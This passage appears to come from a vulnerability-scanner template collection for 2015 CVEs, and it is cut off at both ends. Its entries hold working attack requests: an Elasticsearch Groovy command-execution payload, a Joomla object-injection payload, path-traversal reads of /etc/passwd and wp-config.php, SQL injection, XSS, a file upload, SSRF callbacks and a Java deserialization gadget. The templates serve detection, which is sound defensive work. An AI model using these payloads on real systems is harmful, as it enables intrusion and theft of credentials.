vbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4455","info":{"name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\n","POST /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa\n\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"field_id\"\n\n3\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"form_id\"\n\n1\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"gform_unique_id\"\n\n../../../\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"name\"\n\n{{filename}}.phtml\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.jpg\"\nContent-Type: text/html\n\n{{randstr}}\n--a54906fe12c504cb01ca836d062f82fa--\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Failed to upload file\")","status_code_2 == 200","contains(body_2, \"uploaded_filename\\\":\\\"{{filename}}.jpg\")"],"condition":"and"}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2794","info":{"name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Administrative Information","Database Information"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-20067","info":{"name":"WP Attachment Export < 0.2.4 - Unrestricted File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true","{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/xml\")","contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")"],"condition":"and"}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SourceAfrica","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1635","info":{"name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Range":"bytes=0-18446744073709551615"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HTTP Error 416","The requested range is not satisfiable"],"condition":"and"},{"type":"word","part":"header","words":["Microsoft"]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8562","info":{"name":"Joomla HTTP Header Unauthenticated - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Joomla\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}\ud834\udf06\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Symposium","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Church Admin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory 